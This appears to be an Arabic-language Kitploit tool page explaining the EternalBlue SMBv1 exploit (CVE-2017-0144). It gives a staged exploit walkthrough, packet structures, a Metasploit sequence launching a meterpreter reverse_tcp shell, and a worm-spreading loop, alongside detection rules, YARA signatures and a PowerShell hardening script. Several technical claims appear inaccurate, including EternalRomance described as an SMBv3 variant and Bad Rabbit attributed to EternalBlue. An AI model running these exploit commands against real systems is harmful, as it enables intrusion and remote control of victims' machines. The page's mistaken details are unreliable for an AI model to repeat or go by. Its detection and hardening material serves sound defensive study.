Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
أدوات/GitHubGitHub/firetemple/blackash-cve-2017-0144
تحليل الثغرات الأمنيةالاستغلالالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاختبار الاختراقاستخبارات التهديداتكشف التسللالتعلم والتعليمموارد منسقة
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

147منذ 10 أشهرلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🌐 CVE-2017-0144 — EternalBlue: ثغرة تنفيذ التعليمات البرمجية عن بُعد في SMBv1 لنظام Microsoft Windows

EternalBlue

"استغلال واحد. عشرات العائلات الضارة. مليارات في الأضرار."


🔍 ملخص سطر واحد

CVE-2017-0144 هي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في تطبيق خادم SMBv1 في Microsoft Windows. الاستغلال المعروف باسم EternalBlue استغل هذه الثغرة واستُخدم في هجمات عالية التأثير (أبرزها WannaCry).


🔥 أفضل 10 برمجيات خبيثة استخدمت EternalBlue (تفصيلي)

تنزيل الأداة
#البرنامج الخبيثالنوعأول ظهورالجهة الفاعلةالضررملاحظات
1WannaCryبرمجية فدية12 مايو 2017مجموعة Lazarus (كوريا الشمالية)4-8 مليارات دولارمفتاح القتل: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaماسح (تظاهر بأنه فدية)27 يونيو 2017Sandworm (روسيا)10 مليارات دولار+استخدم Mimikatz + EternalBlue + PSEXEC
3Bad Rabbitبرمجية فدية24 أكتوبر 2017Indrik Spiderإقليميهجوم تحميل مزيف لتحديث Flash
4Uiwixبرمجية فديةمايو 2017غير معروفمنخفضلا مفتاح قتل، أكثر خفاءً من WannaCry
5EternalRocksدودةمايو 2017غير معروفمتوسط7 أدوات NSA (بما في ذلك DoublePulsar)
6Adylkuzzعامل تعدين عملات رقميةمايو 2017غير معروفعالي (صامت)قام بتعدين Monero قبل WannaCry
7Retefeحصان طروادة مصرفي2017–2018غير معروفبنوك أوروبيةاستخدم EternalBlue للحركة الجانبية
8TrickBotبرمجيات معيارية خبيثة2017–2021Wizard Spiderعالميأسقط Ryuk عبر EternalBlue
9Emotetمحمل2017–2021TA542عالمياستخدم كمدخل لـ Cobalt Strike
10Clop / Dridexبرمجية فدية2019–2025TA505الرعاية الصحية، الحكومةلا يزال نشطًا في 2025

🧨 تطور استغلال EternalBlue

eternelblue1
الأداةالإصدارالميزات
EternalBlue (الأصلي)أبريل 2017 (Shadow Brokers)RCE عبر SMBv1
DoublePulsarأبريل 2017زرع باب خلفي (ring0)
EternalRomanceأبريل 2017متغير SMBv3
EternalChampionأبريل 2017مسار SMB بديل
وحدة Metasploitمايو 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchأبريل 2017إطار استغلال NSA
Impacket + PSEXEC2017–2025استغلال SMB بلغة Python
eternelblue2

🔍 كيف تم استغلال CVE-2017-0144 (EternalBlue)

غوص تقني خطوة بخطوة في ثغرة RCE في SMBv1

"حزمة واحدة مشوهة. وصول كامل للنظام SYSTEM. لا تسجيل دخول. لا نقرة."


🎯 تدفق الاستغلال باختصار

root@kitploit:~
[المهاجم] 
   │
   ├──▶ يرسل طلب **Trans2** من SMBv1 مصمم خصيصًا
   │       → يسبب **تجاوز سعة الكومة** في `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ يكتب فوق مؤشرات الدوال → **كود شيل في النواة**
   │
   └──▶ ينفذ باب خلفي **DoublePulsar** → **حمولة في Ring-0**
           (مثل `mssecsvc.exe` من WannaCry)

🛠️ المتطلبات الأساسية للاستغلال

المتطلبالتفاصيل
الهدفWindows مع تمكين SMBv1 (افتراضي قبل Win10)
المنفذ المفتوح445/TCP (أو 139/TCP عبر NetBIOS)
بدون مصادقةغير مصادق — لا حاجة لاسم مستخدم/كلمة مرور
الهيكلx86 أو x64 (كلاهما مدعوم)
حالة التصحيحغير مصحح (قبل MS17-010)

🚀 مراحل الاستغلال (7 خطوات)

المرحلة 1: التفاوض على بروتوكول SMB

root@kitploit:~
SMB_COM_NEGOTIATE → يرسل العميل قائمة اللهجات
يستجيب الخادم: SMBv1 مدعوم → تابع

السبب؟ يؤكد أن SMBv1 نشط.


المرحلة 2: اتصال الشجرة إلى IPC$

eternelblue3
root@kitploit:~
\\TARGET\IPC$ → مشاركة مجهولة لأنابيب SMB

الغرض: إنشاء جلسة لإرسال طلبات المعاملات.


المرحلة 3: إعداد جلسة Trans2 (أساسي)

  • يستخدم SMB_COM_TRANSACTION2 (0x32)
  • الأمر الفرعي: SESSION_SETUP
  • إعداد بنية FEALIST بحجم مشوه
root@kitploit:~
FEALIST {
    SizeOfListInBytes = 0xFFFF (أو قيمة كبيرة)
    ...
}

تشغيل الخطأ: SrvOS2FeaListSizeToNt() تثق بهذا الحجم دون التحقق من الحدود.


المرحلة 4: طلب Trans2 ثانوي (تجاوز السعة)

  • يرسل حزمًا ثانوية متعددة
  • تحتوي كل منها على FEALIST + FEA (السمات الموسعة للملفات) بحجم زائد
eternelblue4
root@kitploit:~
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → تجاوز السعة للمخزن المؤقت
}

رش الكومة: يخصص كتلًا كبيرة للتحكم في تخطيط الذاكرة.


المرحلة 5: تجاوز سعة المخزن المؤقت في النواة

root@kitploit:~
srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // يتحكم فيه المهاجم
    PULONG pNtFeaListSize  // مؤشر الإخراج
)
{
    // لا يوجد تحقق من FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

النتيجة:

  • تجاوز سعة الكومة → الكتابة فوق كائنات النواة المجاورة
  • الهدف: SRVNET_BUFFER أو POOL_HEADER
  • الكتابة فوق مؤشرات الدوال (مثل روتين Free)

المرحلة 6: تنفيذ كود شيل النواة

  • يتحكم المهاجم في RIP/EIP عبر مؤشر دالة مكتوب فوقه
  • يقفز إلى كود الشيل في التجمع غير القابل للترحيل

يقوم كود الشيل بما يلي:

  1. الانتقال من Ring-0 إلى Ring-3 (عبر KeUserModeCallback)
  2. تخصيص ذاكرة في وضع المستخدم
  3. تنزيل/تحميل الحمولة (مثل mssecsvc.exe)
  4. تثبيت الباب الخلفي DoublePulsar

المرحلة 7: زرع الباب الخلفي DoublePulsar

eternelblue6
  • يحقن برنامج تشغيل النواة (مفتاح XOR 0x00120034)
  • يستمع إلى حزم SMB السحرية:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + الحمولة

مثال WannaCry:

root@kitploit:~
EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → تشفير الملفات

🧨 هيكل حزمة الاستغلال (مبسط)

root@kitploit:~
رأس SMB
└── الأمر: 0x32 (TRANSACTION2)
    └── الإعداد: 0x000E (SESSION_SETUP)
        └── المعامل: TotalDataCount = 0x1000
            └── البيانات: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → رش الكومة
                [OVERFLOW] → الكتابة فوق التجمع
                [SHELLCODE] → x64 ring0

🛠️ أدوات الاستغلال الحقيقية

الأداةاللغةالوحدة
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
C2 مخصصC/C++WannaCry, NotPetya

مثال Metasploit

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 أدلة تحليل الذاكرة الجنائي

الأثرالموقعالقيمة
DoublePulsarذاكرة النواةمفتاح XOR 0x00120034
كود الشيلتجمع srvnet.sysنمط 0xCC 0x90 0x48
DLL المحقونC:\Windows\mssecsvc.exeSHA256: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

🛡️ قواعد الكشف

Snort/Suricata

root@kitploit:~
alert tcp any any -> $HOME_NET 445 (
    msg:"محاولة ETERNALBLUE";
    flow:to_server,established;
    content:"|ff|SMB2"; depth:5;
    content:"|00 04 08 00|"; distance:100; within:4;
    classtype:attempted-admin;
    sid:1000001;
)

Zeek (Bro)

root@kitploit:~
event smb1_transaction2_secondary(c: connection, hdr: SMB1::Header, args: SMB1::Trans2_Secondary_Args) {
    if (args$data_len > 4096) {
        NOTICE([$note=SMB::Large_Trans2_Data, $conn=c]);
    }
}

🔄 انتشار الدودة (حلقة WannaCry)

root@kitploit:~
while (true) {
    امسح الشبكة بحثًا عن المنفذ 445
    if (مفتوح) → استغلال EternalBlue
    if (نجاح) → إسقاط mssecsvc.exe + الانتشار
    Sleep(random(1000, 5000))
}

سرعة الانتشار: ~10,000 إصابة/ساعة عالميًا.


🛑 لماذا نجح بشكل كبير

العاملالسبب
بدون مصادقةSMBv1 يسمح بـ IPC$ مجهول
قابل للتحول لدودةمسح LAN مدمج
RCE في النواةيتجاوز AV/مطالبات المستخدم
SMBv1 القديمممكّن افتراضيًا لأكثر من 15 عامًا
الأنظمة غير المصححةXP، 2003، 7 في البنية التحتية الحيوية

🎯 معدل نجاح الاستغلال (2017–2025)

السنةنسبة النجاح % (غير مصحح)
201799%
202085%
2025~60% (القديم فقط)

لا يزال يعمل على Windows 7/2008 R2 بدون MS17-010


📚 المراجع

  • Microsoft MS17-010
  • تحليل RiskSense لـ EternalBlue
  • وحدة Metasploit
  • تسريب NSA FuzzBunch

⚡ الملخص النهائي: كيف تم استغلالها

EternalBlue = خطأ رياضي مسلح
حقل حجم موثوق به في SMB → تجاوز سعة كومة النواة → كود تعسفي → جائحة عالمية للفدية

root@kitploit:~
حزمة SMB → تجاوز المخزن المؤقت → كود شيل النواة → DoublePulsar → البرنامج الخبيث

مرئي، مُحلل، ومُختبر في المعارك. لمختبرات الاختراق، فرق الاستجابة للحوادث، والمدافعين.

"حزمة واحدة. منفذ واحد. سقوط إمبراطورية واحدة."


🛡️ مصفوفة التصحيح والكشف

نظام التشغيلتصحيح KBتعطيل SMBv1نص Nmap
Windows 7 / 2008 R2KB4012212sc config lanmanworkstation depend= bowser/mrxsmb20/nsismb-vuln-ms17-010.nse
Windows 10KB4013429PowerShell: Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
Windows XP (منتهي الدعم)KB4012598 (طارئ)التسجيل: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\SMB1 = 0

🔍 قواعد YARA (أفضل 3 برامج خبيثة)

1. WannaCry

Wana_Decrypt0r_screenshot
root@kitploit:~
rule WannaCry_Ransomware {
    strings:
        $mz = { 4d 5a }
        $s1 = "WannaDecryptor" wide
        $s2 = "tasksche.exe"
        $s3 = "@WANA" ascii
        $encrypt = { 57 61 6E 61 43 72 79 70 74 30 72 }
    condition:
        $mz at 0 and 2 of ($s*)
}

2. NotPetya

Petya A
root@kitploit:~
rule NotPetya_Wiper {
    strings:
        $pdb = "perfc.dat" nocase
        $dll = "dllhost.dat"
        $mof = "ntdevmgr.vbs"
        $mimikatz = "mimikatz"
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

3. حزمة استغلال EternalBlue

nessus1
nessus2
root@kitploit:~
rule EternalBlue_SMB_Exploit {
    strings:
        $smb_negotiate = { 00 00 00 ?? ff 53 4d 42 72 00 }
        $tree_connect = { 00 00 00 ?? ff 53 4d 42 75 00 }
        $trans2 = { 00 00 00 ?? ff 53 4d 42 32 00 }
        $overflow = { 00 04 08 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? }
    condition:
        all of them
}

📊 حالة 2025: هل لا يزال نشطًا؟

المقياسالحالة
SMBv1 مكشوف على Shodan~1.2 مليون (نوفمبر 2025)
استغلالات نشطة (أواني العسل)يوميًا
البرامج الخبيثة التي تستخدمهClop, LockBit (أهداف قديمة)
الأكثر عرضة للخطرالرعاية الصحية، التصنيع، الشركات الصغيرة والمتوسطة
حل Zero Trustحظر 445، فرض MFA، EDR

🛑 سلسلة القتل (MITRE ATT&CK)

المرحلةالتقنيةالمعرف
الوصول الأولياستغلال التطبيق العامT1190
التنفيذRCE في SMB WindowsT1210
الثباتباب خلفي عبر DoublePulsarT1505.003
الحركة الجانبيةمشاركات إدارة SMB/WindowsT1021.002
التأثيرتشفير البيانات للتأثيرT1486

🛠️ نص الإصلاح الكامل (PowerShell)

root@kitploit:~
# === سيناريو تحصين ETERNALBLUE ===
Write-Host "تطبيق الإجراءات التخفيفية لـ EternalBlue..." -ForegroundColor Cyan

# 1. تعطيل SMBv1
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart

# 2. حظر المنفذ 445
New-NetFirewallRule -DisplayName "حظر SMB الوارد" -Direction Inbound -Action Block -Protocol TCP -LocalPort 445

# 3. تمكين توقيع SMB
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RequireSecuritySignature" -Value 1
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1

# 4. التحقق من التصحيح
$patch = Get-HotFix -Id KB4012212 -ErrorAction SilentlyContinue
if ($patch) { Write-Host "مصحح!" -ForegroundColor Green } else { Write-Host "غير مصحح!" -ForegroundColor Red }

Write-Host "مطلوب إعادة تشغيل. تشغيل كمسؤول."

📚 المراجع والمصادر

المصدرالرابط
NVDnvd.nist.gov/vuln/detail/CVE-2017-0144
Microsoft MS17-010msrc.microsoft.com/update-guide
MITRE ATT&CKattack.mitre.org/techniques/T1210
تقرير CrowdStrike عن WannaCrycrowdstrike.com/blog/wannacry
Kaspersky EternalBluekaspersky.com/blog/wannacry-ransomware
بحث Shodanshodan.io/search?query=port%3A445+os%3A%22Windows%22

⚡ الكلمة الأخيرة (2025)

CVE-2017-0144 لم تمت — إنها زومبي قديم.
تزدهر في:

  • Windows 7/2008 غير المصحح
  • تكنولوجيا المعلومات الظلية
  • الأنظمة الحيوية المنعزلة
  • الأجهزة الافتراضية السحابية غير المهيأة بشكل صحيح

إذا كنت تستطيع ping المنفذ 445 من الإنترنت — فأنت التالي.


بُني بدقة ومرئيات واستخبارات تهديدات حقيقية. تم التحديث نوفمبر 2025.
لمختبرات الاختبار، كتيبات الاستجابة للحوادث، أو إحاطات CISO.


"صححه. احظره. اقتله بالنار."